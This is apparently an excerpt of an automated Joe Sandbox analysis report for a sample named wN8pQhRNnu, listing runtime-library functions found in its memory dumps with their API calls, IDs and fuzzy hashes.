Part of subcall function 0248339F: __EH_prolog3_GS.LIBCMT ref: 024833A6
Part of subcall function 0248339F: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 024833B5
Part of subcall function 0248339F: GetProcessAffinityMask.KERNEL32(00000000), ref: 024833BC
Part of subcall function 0248339F: GetCurrentThread.KERNEL32 ref: 024833E4
Part of subcall function 0248339F: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 024833EE

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 024853DB
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02485412
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02485455
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 02485548
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 0248556C
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 02485579

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
String ID:
API String ID: 64082781-0
Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction ID: ec1f16e40baab32c02cbf91ea27a877f726b235705fac7ff2e0b1e332acdcbbc
Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction Fuzzy Hash: 3D61A9719203119FCB18EFA5E8D17AEBBA2FF44716FA5807EC446A7282C730A941CF44

Function 02490C26 Relevance: 15.1, APIs: 10, Instructions: 136threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02490C36
Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 02490C9D
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 02490CBA
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 02490D20
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 02490D35
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 02490D47
Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 02490D75
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 02490D80
__CxxThrowException@8.LIBVCRUNTIME ref: 02490DAC
Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 02490DBC

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
String ID:
API String ID: 3720063390-0
Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction ID: 299487b525ae075706d47c35fb448070024d7cbc4596ec6adf551d963ab329b9
Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction Fuzzy Hash: CC41B230A142489BDF19FFA5C4547FD7BA6AF42304F14406FD8166B382CB659A09CF65

Function 00431DE6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431DFA

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00431E06
_free.LIBCMT ref: 00431E11
_free.LIBCMT ref: 00431E1C
_free.LIBCMT ref: 00431E27
_free.LIBCMT ref: 00431E32
_free.LIBCMT ref: 00431E3D
_free.LIBCMT ref: 00431E48
_free.LIBCMT ref: 00431E53
_free.LIBCMT ref: 00431E61

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84

Function 024A204D Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024A2061

Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9

_free.LIBCMT ref: 024A206D
_free.LIBCMT ref: 024A2078
_free.LIBCMT ref: 024A2083
_free.LIBCMT ref: 024A208E
_free.LIBCMT ref: 024A2099
_free.LIBCMT ref: 024A20A4
_free.LIBCMT ref: 024A20AF
_free.LIBCMT ref: 024A20BA
_free.LIBCMT ref: 024A20C8

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 50f597ad08e1649174e4b31d26c983b551346de7ec64346999a12fc7123fd680
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 8F117476600508AFCB51EF5AC851CD93FA6EF14790B5140AABE098F221EB71EE609F80

Function 0042E1B2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0042E1DE
__cftoe.LIBCMT ref: 0042E210

Strings

F(@, xrefs: 0042E25E, 0042E1CC, 0042E261
F(@, xrefs: 0042E229, 0042E1C0

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: __cftoe
String ID: F(@$F(@
API String ID: 4189289331-2038261262
Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D

Function 0043EEA2 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5

Strings

sqrt, xrefs: 0043F049
log10, xrefs: 0043EF0F, 0043EF5F
exp, xrefs: 0043EF8A, 0043EFEC
acos, xrefs: 0043F03D
pow, xrefs: 0043EFA9, 0043F055, 0043F068
asin, xrefs: 0043F031
log, xrefs: 0043EF6B, 0043EF77

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E

Function 024A3190 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction ID: 34582cfed4f7afd47f8a04efedb635044b3869a79fde31d04e057d8cd1e16a32
Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction Fuzzy Hash: DCC1C070E04349AFDF12DFADC850BAEBFB1AF1A304F04419AE414AB391E7749941CB61

Function 004286D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004286FB
___except_validate_context_record.LIBVCRUNTIME ref: 00428703
_ValidateLocalCookies.LIBCMT ref: 00428791
__IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
_ValidateLocalCookies.LIBCMT ref: 00428811

Strings

csm, xrefs: 004287A6
fB, xrefs: 004287AE, 004287B7, 004287C8

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 1170836740-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99

Function 0248C6C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

atomic_compare_exchange.LIBCONCRT ref: 0248C6DC
atomic_compare_exchange.LIBCONCRT ref: 0248C700
std::_Cnd_initX.LIBCPMT ref: 0248C711
std::_Cnd_initX.LIBCPMT ref: 0248C71F

Part of subcall function 02471370: __Mtx_unlock.LIBCPMT ref: 02471377

std::_Cnd_initX.LIBCPMT ref: 0248C72F

Part of subcall function 0248C3EF: __Cnd_broadcast.LIBCPMT ref: 0248C3F6

Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0248C73D

Strings

t#D, xrefs: 0248C6C2

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
String ID: t#D
API String ID: 4258476935-1671555958
Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction ID: f569ce9ec2b7a229be66d557a78a16237813ca616791f7b0fe54a863ae9fede2
Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction Fuzzy Hash: 1101F771910605ABDB15B7B6CDC4BDEB35EAF00310F54001BE91597680DBB4AA158FA2

Function 00432134 Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
__alloca_probe_16.LIBCMT ref: 004321C6
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
__alloca_probe_16.LIBCMT ref: 004322AB
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
__freea.LIBCMT ref: 0043231B

Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9

__freea.LIBCMT ref: 00432324
__freea.LIBCMT ref: 00432349

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698

Function 024A1129 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024A2141: GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
Part of subcall function 024A2141: _free.LIBCMT ref: 024A2178
Part of subcall function 024A2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

_free.LIBCMT ref: 024A1444
_free.LIBCMT ref: 024A145D
_free.LIBCMT ref: 024A148F
_free.LIBCMT ref: 024A1498
_free.LIBCMT ref: 024A14A4

Strings

C, xrefs: 024A1291

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction ID: 5116b0abada86bb7d165f5444f58669002a187c5d5234c72b7cf3bd9fb6791e7
Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
Instruction Fuzzy Hash: 2DB12775A012299FDB24DF18C894BAEB7B5FB18304F1445AED84DA7390E770AE90CF40

Function 00439EAE Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439F1D
_free.LIBCMT ref: 00439F2B
_free.LIBCMT ref: 0043A059
_free.LIBCMT ref: 0043A064

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59

Function 024AA115 Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024AA184
_free.LIBCMT ref: 024AA192
_free.LIBCMT ref: 024AA2C0
_free.LIBCMT ref: 024AA2CB

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction ID: 98b794772e495da6d9d74359f85992a6912aa08e5e2d37ba04da51f5fbb31c89
Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
Instruction Fuzzy Hash: D061D272900215AFDB20CFA9C851B9ABBF6FF59710F2441ABE844EB341E771A991CB50

Function 00433883 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
__fassign.LIBCMT ref: 00433940
__fassign.LIBCMT ref: 0043395B
WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
Opcode Fuzzy Hash: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
Instruction Fuzzy Hash: 3451C271E00209AFDB10DFA8D885BEEBBF4EF09301F14412BE556E7291E7749A41CB69

Function 024A3AEA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,0249C4A4,E0830C40,?,?,?,?,?,?,024A425F,0247E03C,0249C4A4,?,0249C4A4,0249C4A4,0247E03C), ref: 024A3B2C
__fassign.LIBCMT ref: 024A3BA7
__fassign.LIBCMT ref: 024A3BC2
WideCharToMultiByte.KERNEL32(?,00000000,0249C4A4,00000001,?,00000005,00000000,00000000), ref: 024A3BE8
WriteFile.KERNEL32(?,?,00000000,024A425F,00000000,?,?,?,?,?,?,?,?,?,024A425F,0247E03C), ref: 024A3C07
WriteFile.KERNEL32(?,0247E03C,00000001,024A425F,00000000,?,?,?,?,?,?,?,?,?,024A425F,0247E03C), ref: 024A3C40

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
Instruction ID: 84bc4c91e45cf4b55f8d9e45d862e0fafb45de2b319ebaeded20b911245305d8
Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
Instruction Fuzzy Hash: D351E575A00208AFDB10CFA8DC94AEEBBF5EF19700F14415FE555E7291E7309A81CB60

Function 02494AB4 Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 02494ACD

Part of subcall function 02494D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,02494800), ref: 02494DAC

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 02494AE2
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02494AF1
__CxxThrowException@8.LIBVCRUNTIME ref: 02494AFF
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 02494B75
std::invalid_argument::invalid_argument.LIBCONCRT ref: 02494BB5
__CxxThrowException@8.LIBVCRUNTIME ref: 02494BC3

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID:
API String ID: 3151764488-0
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 27807ad9f185a068bac2a013616ef9592b8f6e11a618ce762696f387e6df2841
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: 4331B439A002149BCF04EF69C885B6E7BB6FF44714F20456BD9259B381DB70EA06CB94

Function 0043F941 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669

Function 024AFBA8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction ID: a3147bb91cd1a6b519d6c0c9a95b65df1d0121d9278bc457663a3614d2c08a48
Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction Fuzzy Hash: CB11D632605125BFDB216F778C5896B7E6DFF96B61B110A2BFC15C7240DB318845CAB0

Function 0043A383 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3

_free.LIBCMT ref: 0043A3D1

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A3DC
_free.LIBCMT ref: 0043A3E7
_free.LIBCMT ref: 0043A43B
_free.LIBCMT ref: 0043A446
_free.LIBCMT ref: 0043A451
_free.LIBCMT ref: 0043A45C

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46

Function 024AA5EA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024AA331: _free.LIBCMT ref: 024AA35A

_free.LIBCMT ref: 024AA638

Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9

_free.LIBCMT ref: 024AA643
_free.LIBCMT ref: 024AA64E
_free.LIBCMT ref: 024AA6A2
_free.LIBCMT ref: 024AA6AD
_free.LIBCMT ref: 024AA6B8
_free.LIBCMT ref: 024AA6C3

Memory Dump Source

Source File: 00000000.00000002.4130731595.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_wN8pQhRNnu.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 90cb78883c5bddc800448d2ed1f22daa0a4e3ce3442c1cc19a09dbb4cb2cb69a
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: 95115471644B14AEDE30BB73CC65FCF7BAEDF10740F40082EA399AA150E6A5B5148F60

Function 004123F2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412400
GetLastError.KERNEL32 ref: 00412406
GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412433
GetLastError.KERNEL32 ref: 0041243D
GetLastError.KERNEL32 ref: 0041244F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
__CxxThrowException@8.LIBVCRUNTIME ref: 00412473

Memory Dump Source

Source File: 00000000.00000002.4130254618.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wN8pQhRNnu.jbxd

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D

Function 02482659 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 02482667
GetLastError.KERNEL32 ref: 0248266D
GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 0248269A
GetLastError.KERNEL32 ref: 024826A4
GetLastError.KERNEL32 ref: 024826B6
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024826CC
__CxxThrowException@8.LIBVCRUNTIME ref: 024826DA

Memory Dump Source

